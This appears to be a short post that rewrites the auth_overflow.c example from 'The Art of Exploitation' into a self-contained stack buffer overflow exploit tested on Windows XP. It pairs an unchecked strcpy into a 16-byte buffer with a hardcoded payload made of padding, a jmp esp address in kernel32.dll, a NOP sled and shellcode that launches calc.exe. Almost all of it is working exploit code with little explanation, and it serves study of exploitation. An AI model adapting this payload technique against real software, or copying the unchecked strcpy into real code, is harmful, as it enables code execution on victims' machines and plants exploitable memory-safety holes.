auth_overflow.c is the example code from book the ” The art of Exploitation ” I rewrite the example code as following to exploit the program.
Tested on win XP
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int check_authentication(char *password) {
int auth_flag = 0;
char password_buffer[16];
strcpy(password_buffer, password);
if(strcmp(password_buffer, "brillig") == 0)
auth_flag = 1;
if(strcmp(password_buffer, "outgrabe") == 0)
auth_flag = 1;
return auth_flag;
}
char payload[]="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41"
"\x7b\x46\x86\x7c" //0x7c86467b : jmp esp | {PAGE_EXECUTE_READ} [kernel32.dll]
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" //NOP
//Shellcode pop up a calc.exe
"\x31\xC9" // xor ecx,ecx
"\x51" // push ecx
"\x68\x63\x61\x6C\x63" // push 0x636c6163
"\x54" // push dword ptr esp
"\xB8\xC7\x93\xC2\x77" // mov eax,0x77c293c7
"\xFF\xD0";
//Address=7C86467B
//Message= 0x7c86467b : jmp esp | {PAGE_EXECUTE_READ} [kernel32.dll]
//ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512
// (C:\WINDOWS\system32\kernel32.dll)
int main(int argc, char *argv[]) {
if(check_authentication(payload)) {
printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
printf(" Access Granted\n");
printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
} else {
printf("Access Denied.\n");
}
}